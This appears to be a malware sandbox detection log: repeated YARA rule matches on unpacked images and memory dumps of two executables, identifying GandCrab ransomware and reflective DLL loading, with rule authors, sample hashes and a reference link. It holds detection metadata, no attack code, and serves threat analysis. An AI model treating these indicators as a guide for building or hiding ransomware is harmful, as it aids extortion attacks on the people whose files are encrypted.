Source: 0.3.IJr8RvvhZ3.exe.3210000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.3.IJr8RvvhZ3.exe.3210000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.3.IJr8RvvhZ3.exe.3210000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.3.IJr8RvvhZ3.exe.3210000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.3.IJr8RvvhZ3.exe.3210000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 11.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 11.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 11.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 11.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 11.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 27.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 27.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 27.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 27.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 27.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 19.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 19.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 19.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 19.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 19.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 12.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 12.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 12.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 12.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 12.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 16.3.mqsmvj.exe.3b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 16.3.mqsmvj.exe.3b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 16.3.mqsmvj.exe.3b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 16.3.mqsmvj.exe.3b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 16.3.mqsmvj.exe.3b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 12.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 12.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 12.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 12.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 12.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 28.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 28.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 28.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 28.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 28.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 37.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 37.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 37.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 37.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 37.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 14.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 14.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 14.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 14.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 14.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
